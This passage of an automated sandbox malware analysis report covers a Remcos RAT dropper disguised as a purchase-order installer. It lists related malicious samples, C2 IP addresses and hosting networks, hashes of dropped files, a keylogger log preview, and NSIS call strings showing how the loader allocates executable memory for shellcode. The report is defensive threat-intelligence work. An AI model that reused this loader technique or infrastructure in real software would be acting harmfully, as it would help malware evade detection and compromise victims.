                                    • Successful, ratio: 97%
                                    • Number of executed functions: 182
                                    • Number of non-executed functions: 316
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                    • Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.63
                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                    • VT rate limit hit for: Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe
                                    No simulations
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    178.237.33.50givenbestupdatedoingformebestthingswithgreatnewsformegive.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                    • geoplugin.net/json.gp
                                    clearentirethingwithbestnoticetheeverythinggooodfrome.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                    • geoplugin.net/json.gp
                                    7Sbq4gMMlp.exeGet hashmaliciousRemcosBrowse
                                    • geoplugin.net/json.gp
                                    PO_0099822111ORDER.jsGet hashmaliciousRemcosBrowse
                                    • geoplugin.net/json.gp
                                    requests-pdf.exeGet hashmaliciousRemcosBrowse
                                    • geoplugin.net/json.gp
                                    Documents.pdfGet hashmaliciousRemcos, DBatLoaderBrowse
                                    • geoplugin.net/json.gp
                                    x295IO8kqM.exeGet hashmaliciousRemcosBrowse
                                    • geoplugin.net/json.gp
                                    7d74ApV4bb.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                    • geoplugin.net/json.gp
                                    greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                    • geoplugin.net/json.gp
                                    SwiftCopy_PaymtRecpt121224.exeGet hashmaliciousRemcosBrowse
                                    • geoplugin.net/json.gp
                                    162.251.122.87WO-663071 Sabiya Power Station Project.vbsGet hashmaliciousRemcosBrowse
                                      scan_241205-801_draft_PO.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        geoplugin.netgivenbestupdatedoingformebestthingswithgreatnewsformegive.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                        • 178.237.33.50
                                        clearentirethingwithbestnoticetheeverythinggooodfrome.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                        • 178.237.33.50
                                        7Sbq4gMMlp.exeGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        PO_0099822111ORDER.jsGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        requests-pdf.exeGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        Documents.pdfGet hashmaliciousRemcos, DBatLoaderBrowse
                                        • 178.237.33.50
                                        x295IO8kqM.exeGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        7d74ApV4bb.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                        • 178.237.33.50
                                        greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                        • 178.237.33.50
                                        SwiftCopy_PaymtRecpt121224.exeGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        ASN-QUADRANET-GLOBALUSarmv4l.elfGet hashmaliciousMiraiBrowse
                                        • 204.44.218.122
                                        rebirth.arm7.elfGet hashmaliciousMirai, OkiruBrowse
                                        • 104.223.28.126
                                        jew.arm.elfGet hashmaliciousUnknownBrowse
                                        • 72.11.146.73
                                        2.elfGet hashmaliciousUnknownBrowse
                                        • 173.205.82.95
                                        Josho.arm7.elfGet hashmaliciousMiraiBrowse
                                        • 185.228.81.1
                                        tQoSuhQIdC.msiGet hashmaliciousUnknownBrowse
                                        • 66.63.187.205
                                        Ref#60031796.exeGet hashmaliciousRemcosBrowse
                                        • 69.174.98.48
                                        gC0jV08bP3.exeGet hashmaliciousMeduza Stealer, PureLog Stealer, RedLine, zgRATBrowse
                                        • 66.63.187.209
                                        7xweUz2MYa.exeGet hashmaliciousMeduza Stealer, PureLog Stealer, RedLine, zgRATBrowse
                                        • 66.63.187.209
                                        .main.elfGet hashmaliciousXmrigBrowse
                                        • 66.63.187.200
                                        ATOM86-ASATOM86NLgivenbestupdatedoingformebestthingswithgreatnewsformegive.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                        • 178.237.33.50
                                        clearentirethingwithbestnoticetheeverythinggooodfrome.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                        • 178.237.33.50
                                        7Sbq4gMMlp.exeGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        PO_0099822111ORDER.jsGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        requests-pdf.exeGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        Documents.pdfGet hashmaliciousRemcos, DBatLoaderBrowse
                                        • 178.237.33.50
                                        x295IO8kqM.exeGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        7d74ApV4bb.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                        • 178.237.33.50
                                        greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                        • 178.237.33.50
                                        SwiftCopy_PaymtRecpt121224.exeGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        UNREAL-SERVERSUSWO-663071 Sabiya Power Station Project.vbsGet hashmaliciousRemcosBrowse
                                        • 162.251.122.87
                                        RFQ 008191.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                        • 212.162.149.89
                                        purchase.order.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                        • 212.162.149.66
                                        Forhandlingsfriheden.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                        • 212.162.149.66
                                        order CF08093-24.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                        • 212.162.149.89
                                        PO. A-72 9234567.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                        • 212.162.149.89
                                        la.bot.arm7.elfGet hashmaliciousMiraiBrowse
                                        • 162.251.123.175
                                        file.exeGet hashmaliciousRedLineBrowse
                                        • 212.162.149.48
                                        https://haqzt.trc20.kcgrocks.com/merchantServicesGet hashmaliciousUnknownBrowse
                                        • 172.96.10.214
                                        scan_241205-801_draft_PO.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                        • 162.251.122.87
                                        No context
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        C:\Users\user\AppData\Local\Temp\nsh620C.tmp\System.dllkahyts.exeGet hashmaliciousGuLoaderBrowse
                                          kahyts.exeGet hashmaliciousGuLoaderBrowse
                                            https://www.imobie.com/go/download.php?product=atiGet hashmaliciousUnknownBrowse
                                              Synarmogoidea.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                Synarmogoidea.exeGet hashmaliciousGuLoaderBrowse
                                                  https://dldir1v6.qq.com/weixin/Windows/WeChatSetup.exeGet hashmaliciousUnknownBrowse
                                                    https://dldir1v6.qq.com/weixin/Windows/WeChatSetup.exeGet hashmaliciousUnknownBrowse
                                                      SecuriteInfo.com.Trojan.Encoder.17199.16872.exeGet hashmaliciousGuLoaderBrowse
                                                        SecuriteInfo.com.Trojan.Encoder.17199.16872.exeGet hashmaliciousGuLoaderBrowse
                                                          wechat_XC560-1.exeGet hashmaliciousUnknownBrowse
                                                            Process:C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):144
                                                            Entropy (8bit):3.3934082720720298
                                                            Encrypted:false
                                                            SSDEEP:3:rhlKlyKIlfVlc9lwfU5JWRal2Jl+7R0DAlBG45klovDl6v:6lZ4BfU5YcIeeDAlOWAv
                                                            MD5:29FBE80C0A900EEF9854EEFF13F4804C
                                                            SHA1:E9B115C6F3AC3B7C53D36849198656B6ADA9E89D
                                                            SHA-256:BB69EF9658C21C064642214919559377EF7D4A635663690F31292618F4C0B5DA
                                                            SHA-512:0AF484D09C5757C369A0F458D4E3B6F1D0DC07F1B6E8839D12E5DA782A1CBC758FAFA833F781C430301BCBF41ACE9334B8C552B6D09BDF5A980C76D238C4D42B
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                            Reputation:low
                                                            Preview:....[.2.0.2.4./.1.2./.1.6. .0.9.:.2.8.:.0.5. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                            Process:C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe
                                                            File Type:JSON data
                                                            Category:dropped
                                                            Size (bytes):963
                                                            Entropy (8bit):5.0171130712019085
                                                            Encrypted:false
                                                            SSDEEP:12:tkluWJmnd66GkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkD:qlupdbauKyGX85jvXhNlT3/7CcVKWro
                                                            MD5:0A55905951B6633AC409C89A600E5B38
                                                            SHA1:A8D63D48564E1A2F3C222B98C163E9B541042DA2
                                                            SHA-256:1E06332C729A91A1DBE6ABE75457CA239DAB2B3EC27E3AAC6BD57D357EF35FEC
                                                            SHA-512:99BE9B0C66C0C52F9F96B764146382DF6A93CF4EC053219903C2B7316136DDAA7E4510EBB5D4BADE50685C6A77F52FD81F594A22D7BF147576F464C3FAABD486
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:{. "geoplugin_request":"8.46.123.189",. "geoplugin_status":200,. "geoplugin_delay":"0ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7503",. "geoplugin_longitude":"-74.0014",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                            Process:C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):52
                                                            Entropy (8bit):4.725996747697686
                                                            Encrypted:false
                                                            SSDEEP:3:HM/xiXWR0AXQQLQIfLBJXmgxv:HHpQkIP2I
                                                            MD5:87C38DC6EF4616FF016D1CCC1A793086
                                                            SHA1:AFC6434AAAD4FB1A250AF0D167DAB718DA10B4AF
                                                            SHA-256:781C527A7A89FDBFA481BF8800E255DC1B69E47B2B68040DC39103C114E31849
                                                            SHA-512:CC8EF7D9C98FB663C79A4A00FD68344F7AA3DBA27D68B3AEF463C758A74AEBF8190C8A9532FE91BC7DB32E78FF2C48C43230F03DA226F9A9EF288324EFEBF0FE
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:[Initialize]..First=user32::EnumWindows(i r1 ,i 0)..
                                                            Process:C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe
                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0x8877d542, page size 32768, DirtyShutdown, Windows version 10.0
                                                            Category:dropped
                                                            Size (bytes):15728640
                                                            Entropy (8bit):0.9442057998896064
                                                            Encrypted:false
                                                            SSDEEP:12288:ocCS8rMTkTaTeUZT+T5SFnTKXpmlGVvK:ocrTGv
                                                            MD5:EA839E1172C5890D56BC74F8353B9497
                                                            SHA1:987F613FBCF5A3111A8369F95A414B0A9094B7A9
                                                            SHA-256:9E74DF90CF3964A23D25CC3FA96CDEA6ABCEF3B4F0F43B1CB3674AA27F3FCF37
                                                            SHA-512:43DD0B18C98C0BDC6E585B52E8A889DD34B782CEB5B641F2DE23AA484EF6D59F4011EF8671BAB165A45784731D87DD05DBB08C85CADE4F13CEFA3386811D23C0
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:.w.B... .......!........v.......{......................d........$...{..:....|s.h...........................0s......{..............................................................................................Y...........eJ......n........................................................................................................... ........"...{..............................................................................................................................................................................................;....{..................................4w..:....|..................-.i.:....|s..........................#......h.......................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):74
                                                            Entropy (8bit):3.9637832956585757
                                                            Encrypted:false
                                                            SSDEEP:3:sRQE1wFEt/ijNJyI3dj2+n:aQEGiwh3D
                                                            MD5:16D513397F3C1F8334E8F3E4FC49828F
                                                            SHA1:4EE15AFCA81CA6A13AF4E38240099B730D6931F0
                                                            SHA-256:D3C781A1855C8A70F5ACA88D9E2C92AFFFA80541334731F62CAA9494AA8A0C36
                                                            SHA-512:4A350B790FDD2FE957E9AB48D5969B217AB19FC7F93F3774F1121A5F140FF9A9EAAA8FA30E06A9EF40AD776E698C2E65A05323C3ADF84271DA1716E75F5183C3
                                                            Malicious:false
                                                            Reputation:moderate, very likely benign file
                                                            Preview:kernel32::CreateFileA(m r4 , i 0x80000000, i 0, p 0, i 4, i 0x80, i 0)i.r5
                                                            Process:C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):11776
                                                            Entropy (8bit):5.6559337539154555
                                                            Encrypted:false
                                                            SSDEEP:192:eo24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35Ol6Sl:k8QIl975eXqlWBrz7YLOl6
                                                            MD5:CA332BB753B0775D5E806E236DDCEC55
                                                            SHA1:F35EF76592F20850BAEF2EBBD3C9A2CFB5AD8D8F
                                                            SHA-256:DF5AE79FA558DC7AF244EC6E53939563B966E7DBD8867E114E928678DBD56E5D
                                                            SHA-512:2DE0956A1AD58AD7086E427E89B819089F2A7F1E4133ED2A0A736ADC0614E8588EBE2D97F1B59AB8886D662AEB40E0B4838C6A65FBFC652253E3A45664A03A00
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Joe Sandbox View:
                                                            • Filename: kahyts.exe, Detection: malicious, Browse
                                                            • Filename: kahyts.exe, Detection: malicious, Browse
                                                            • Filename: , Detection: malicious, Browse
                                                            • Filename: Synarmogoidea.exe, Detection: malicious, Browse
                                                            • Filename: Synarmogoidea.exe, Detection: malicious, Browse
                                                            • Filename: , Detection: malicious, Browse
                                                            • Filename: , Detection: malicious, Browse
                                                            • Filename: SecuriteInfo.com.Trojan.Encoder.17199.16872.exe, Detection: malicious, Browse
                                                            • Filename: SecuriteInfo.com.Trojan.Encoder.17199.16872.exe, Detection: malicious, Browse
                                                            • Filename: wechat_XC560-1.exe, Detection: malicious, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L....\.U...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..b....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):1554966
                                                            Entropy (8bit):3.691988975121528
                                                            Encrypted:false
                                                            SSDEEP:12288:/aJw9vN2w+AiPsS2cuCTCXWZs6MujfzDl8epP7:vhPiPHDDs697vl8eV
                                                            MD5:1832304736BCD49E2CC1250767886F1C
                                                            SHA1:1B98A73E2D6C6480C335BDDC4BA1B45DD2D8CB85
                                                            SHA-256:D9460939AA35D44E7B469955227D37023A78E954F94AB73BBC765DEE9C92E03C
                                                            SHA-512:05982697F286B93A6058FEA51F54E3CE86E63079807F7F61C72416A295AE181510A09AF0EA61818D0B1658BF0A5DB0625F8659D53F815D7536AF090679C0829A
                                                            Malicious:false
                                                            Preview:."......,...................h...d........!......."..........................................................................................................................................................................................................................................G...Y...........=...j...............................................................................................................................g..............................................................._.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.454248670673993
                                                            Encrypted:false
                                                            SSDEEP:3:sEMBQEJkJVEjZXJdEmxQoXUn:4EmxvUn
                                                            MD5:7ED75A71351BFC4EAABFC06754E83A71
                                                            SHA1:B588DF2F060E1356E9950344D31DC8B566EA5E43
                                                            SHA-256:2D45FD2175AD61122CA69DC5FB613B7CFC525C489F08942B81C9F7546AB303C6
                                                            SHA-512:2E92B886FB3149912A627BDCCADA189179AA7E04600177DEF15270B7346E0DA45DB52DDAA75E9E6D40458C8D0BBA870CFCEDA39C160865060D4F11F11B9F6A6F
                                                            Malicious:false
                                                            Preview:kernel32::VirtualAlloc(i 0,i 96215040, i 0x3000, i 0x40)p.r1
                                                            Process:C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):56
                                                            Entropy (8bit):4.24214984251469
                                                            Encrypted:false
                                                            SSDEEP:3:sAAEVvjskXMFVL84n:fLjMFP
                                                            MD5:2A8DFC4215838CE8D954BCFF8953B756
                                                            SHA1:CEBF9D7F11F532EAA0FE550EF52BF70FDDDA467A
                                                            SHA-256:BA47E738C0828BA56F6BDC98E96919790B83295A1460C773B930CC52747F9E76
                                                            SHA-512:809C8DB67849DC9337F7E9E827E3CAA95AAFA41235AD7B4CA614EB3089E8F5792DC7BA066BDED856A19096583C73245B5015B12A01A81256382885FFA8EC505B
                                                            Malicious:false
                                                            Preview:kernel32::ReadFile(i r5, i r1, i 96215040,*i 0, i 0)i.r3
                                                            Process:C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):30
                                                            Entropy (8bit):4.256564762130954
                                                            Encrypted:false
                                                            SSDEEP:3:DyWgLQIfLBJXmgU:mkIP25
                                                            MD5:F15BFDEBB2DF02D02C8491BDE1B4E9BD
                                                            SHA1:93BD46F57C3316C27CAD2605DDF81D6C0BDE9301
                                                            SHA-256:C87F2FF45BB530577FB8856DF1760EDAF1060AE4EE2934B17FDD21B7D116F043
                                                            SHA-512:1757ED4AE4D47D0C839511C18BE5D75796224D4A3049E2D8853650ACE2C5057C42040DE6450BF90DD4969862E9EBB420CD8A34F8DD9C970779ED2E5459E8F2F1
                                                            Malicious:false
                                                            Preview:user32::EnumWindows(i r1 ,i 0)
                                                            Process:C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):52
                                                            Entropy (8bit):4.0914493934217315
                                                            Encrypted:false
                                                            SSDEEP:3:sBa99k1NoCFOn:KankVg
                                                            MD5:5D04A35D3950677049C7A0CF17E37125
                                                            SHA1:CAFDD49A953864F83D387774B39B2657A253470F
                                                            SHA-256:A9493973DD293917F3EBB932AB255F8CAC40121707548DE100D5969956BB1266
                                                            SHA-512:C7B1AFD95299C0712BDBC67F9D2714926D6EC9F71909AF615AFFC400D8D2216AB76F6AC35057088836435DE36E919507E1B25BE87B07C911083F964EB67E003B
                                                            Malicious:false
                                                            Preview:kernel32::SetFilePointer(i r5, i 1200 , i 0,i 0)i.r3
                                                            Process:C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe
                                                            File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):2
                                                            Entropy (8bit):1.0
                                                            Encrypted:false
                                                            SSDEEP:3:Qn:Qn
                                                            MD5:F3B25701FE362EC84616A93A45CE9998
                                                            SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                            SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                            SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                            Malicious:false
                                                            Preview:..
                                                            Process:C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):56164
                                                            Entropy (8bit):4.591658027454623
                                                            Encrypted:false
                                                            SSDEEP:1536:BDxs8+UFFvPA45+4zDjtBSfcx7EmGBENJAX:BFrJI4zD5BSoYm8Ew
                                                            MD5:19D902112F21E486043C4E895B336C64
                                                            SHA1:A22415FC03A7564ED65DE87566E8B3514104A315
                                                            SHA-256:FCCF426896260DC7AA3282D0632FD642057E2EB666178CCF2AD987431B80D5BE
                                                            SHA-512:F9BEA978903C8F60D52A016D9EA5F5EFBF4311B25301E059C66FEB350598A40C3BB443BC3A5D17BD9322E30FD6C6E712129AB55D481C3EF7996566D2D15F4D70
                                                            Malicious:false
                                                            Preview:.........h..........6...<.......d......|.......(((..EEEEEE........................................................................0................O...................S..................QQ........MM....d.....................a...... ....U.**.....e.............f.0000000.-..2.......KKKKKK.....K......yyy.........................................DDDDD..............,,,..........BB...................0....A...GG.ccccc.......%..........GGG.X........qq.......1.................,..................(...........L.........m..........nnn...zzzz.....`...<<..P....SSSS.!...f...?.......S....................FF..............................r.......++++..11111...............$.......++..............................ZZZ...o...C.............x...~........<<..........................,,.......~.*..aaa.E...............o...............VVV..X......F............... .+......vv.F..M.qq............PPPPPP.......oo.......HH.``.........`.}.......cc.\.........=.R..*.WW.y.....t.!........$.""".............~......888..........==
                                                            Process:C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):441111
                                                            Entropy (8bit):7.094822104870974
                                                            Encrypted:false
                                                            SSDEEP:6144:X2C2GH05XuJw9vMDS3D602xpAX+xN+S0uyJG3VxUS8S2cuCTCvvOv9rH7OYkzGe9:maJw9vN2w+AiPsS2cuCTCXWZs6M7
                                                            MD5:90627787ED1FE6CA1F762598EB3B9445
                                                            SHA1:F9E9C7FD0B5568E8409ED0D7FE04F695ED77EE1C
                                                            SHA-256:8A74CCCFFD81428CA6B782C9D059ADA92F070A8D4C017E697C385D2A2B161F8E
                                                            SHA-512:A1A30CEF2C196E4357DB84302BD4FC9CBCD00EC917D7AA4A0028D1A4FCBCD1E301F44076267D19994FCA9750209496F20D47509DE327DD5F3FA60C5F135C4265
                                                            Malicious:false
                                                            Preview:...P.....................x.5555.........Z........I..............f...........x......*.............................h...................................g..T......e..'.......K.7.#...``. ............t.;..~............................--................__.3.......;;;;;.............ZZ........................nn..................5.........K.............R........mm.......22..............?????..........D.V......y..........,...................;........................aa....?.L.................444444......>>>......................[[...jjjj......w...*......O............{........].....SSSSS.._.............................E..........II........9........ZZ....................P.............................................WWW..............###........tt....F.....................DD.....{.ff.............888...........f... ...........HH.............D......................._... ..DD........ggggg.....*.y.'..n...)..............``.................>..........................\\\.]]]..NNN.......h.VV......W.......e
                                                            Process:C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):366017
                                                            Entropy (8bit):1.2532028651885465
                                                            Encrypted:false
                                                            SSDEEP:768:dbvIzLHxoD5eNiie4lwAqTxNpy1eR0AByGhsjNV+k8jonGozrxNC/+BuLoi2DA9J:dI+LxNQtzwGxHzi+tbTYv4QFZfMG
                                                            MD5:8DEF494BFC232DD8D9DA302DD0F500AD
                                                            SHA1:1AD2FAA4B812AC0C6D01A262590DFC8066A9AE30
                                                            SHA-256:2A45F95B9F82E3F400E065F16025346A5278BB03D55E3F3D3BB04837A32EF69E
                                                            SHA-512:106D4C3277F0C5B374D725F042EEFBF241ACFE55899BD42EFF7D7CE56A4908FA3B5CFD75B7FFD3187D76357C85CDC7E82DC93FD9D076C8EF62704D316C2EB244
                                                            Malicious:false
                                                            Preview:...........2............................................m..........................Q..............{...._....................=...._..6.....c......................~................................"................5..................................../...................................................P....D....................................................O........................................o...................../....................................................................Z..."..........i.........................................................................4.rE......L.................7........................................................................t....................................q.....................................................p.............q....................................................................>..$.................(.......].............................................................+...................d.................................
                                                            Process:C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):408
                                                            Entropy (8bit):4.299736369748956
                                                            Encrypted:false
                                                            SSDEEP:12:d10AgX3AR5XDgWIMF+3I/rb7HPkvQXkFt1gSuaAy:T0tX3iVkWIMF+3I/LP+QG1rr9
                                                            MD5:04EA5F289C84B44129BCFA191ECED45B
                                                            SHA1:E2505ED098F8B9815005EE58BDDACF40179C9D86
                                                            SHA-256:9AA6257187EB745A66D35AE1536ECDB075E22CD48D941C5AE1AFE3287CF3FCEE
                                                            SHA-512:798B8B1A5B0707CEBAD64414ABD7E238C3C4CBEF02696A6CDC98E3427406D74B47FF41B6DF1796F204FE58947156CDE8A332FC2B11884E724B54FC02C248450A
                                                            Malicious:false
                                                            Preview:blockhole hermafrodittens brawlingly seropus milieuomraadets annebeths..prolixity maskinstuers kattemaden fejltrinenes horoscoper everhart.tuskes superaspiration instinkterne gluneamie.applikationsprogrammrens forhekselserne hes bisamrottes gretel balaenoid datebook uniflowered..afrohaarets cholralosed forflg,didaktiker pseudophallic frskolealder squattiness ulotrichaceous consumation opgavesttets repos..
                                                            Process:C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):231219
                                                            Entropy (8bit):1.2469505743129965
                                                            Encrypted:false
                                                            SSDEEP:768:kG1XbScC6kNorGiP8+Fq6BiOiqrcS3M6X7QQz82rc//gKj0OVdY0vLTRX34nSaIc:kPNj+/Vy6XTKjTZn5Wb/8
                                                            MD5:B8DCFF52B32142B46BCF9E07C97FE39B
                                                            SHA1:1DC3097327E42B862D9DAAA41F6B4DB8417D44B4
                                                            SHA-256:1C74E5F1420689E862000BE741AE2B1E0E85861269454B028C231CCB7AB20260
                                                            SHA-512:B6EB26FE2DA081E8CDFA0C0B9E7CF63F40EA561A6A743BD67D0B1564CEB354C7D7B26D28AB3060E381D0B8CD08B9E9E9F7FD03C63FE4750F02796E8B45F304FC
                                                            Malicious:false
                                                            Preview:...................*..................................&.....j...........2....................................]......*1....P......................I................T..................................7................................................................".......................................................\.....................f....5...............F..................{........h..................+..........Z.............................@.................A.@..............Q................................................................................................................................................................i...5.....G...................................................>1.................x...a...............7...........................................................&......................e....................................................<.k...........................................V..................................................................h...
                                                            Process:C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):439309
                                                            Entropy (8bit):1.2535989842374102
                                                            Encrypted:false
                                                            SSDEEP:768:BDBApFss1TiZa+ZJGxLn2CGfgUdqiY4H258QjjjIAfXMsSFa3C59X66JAqtkEBRU:cB7A32jjaikB4eNkPO+jvCMUB9
                                                            MD5:A52FC0A739A55A6C379086CF33B63E8A
                                                            SHA1:00F9D7338B1858C9625C2524CB30E9C01BCD70E1
                                                            SHA-256:3D94DFA61B0EA65EB5D101A193BE132433B5C875342CBAF3107EB4F671C7155B
                                                            SHA-512:2C816D9B05C5C9EADC5EC32A256619257D876296385D25DD3A2B7923D397045FD937BC9BEE9AB20C31F3E78E46FDEB45D8256635F9BA6E1D2619E2C03BFF12D3
                                                            Malicious:false
                                                            Preview:.....X................9.............Q........`..f.......7..................................... .........................|....O.................................B...t...................................................,..h.....................................................................,.....................................r.................................................................+.................................................v.........Q.............!........................................|...........................>.............................................#.................................................................................h.................E................6....k..................}.......................................[..........................:............................=..............................}..........f............................................................../......=...E............................................A...................
                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                            Entropy (8bit):7.716339905433937
                                                            TrID:
                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                            • DOS Executable Generic (2002/1) 0.02%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
